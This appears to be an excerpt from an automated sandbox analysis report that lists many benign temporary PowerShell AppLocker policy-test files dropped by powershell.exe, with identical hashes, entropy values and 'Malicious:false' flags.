                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jkga2za.pgc.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25kulqjn.5qy.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qsopa4f.5b2.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3a014xpw.qbu.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ephga5h.im0.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kmrh0zu.tki.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5c53mjxp.4eb.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aq0tvdaw.o0n.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b11fnjmk.cvl.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmbxyud3.akj.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_by0ghos4.0wr.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cauz14vo.kyj.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccdzs2bj.lca.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgfclg3t.aof.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_di2g5mtz.ait.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dv5cuqn0.clo.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1enao2c.fwx.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0mc0015.3zu.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdfsytgi.nod.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fl0mwkuv.mtx.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hl1neetc.vjl.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hsteakfu.eyv.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3jhrget.umm.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ieb0vr4m.cqm.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ifr2tq3v.knu.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jegf4i2t.53e.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jiw5v0v0.ols.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k2zdr13z.vf0.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqkvm45t.dwr.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
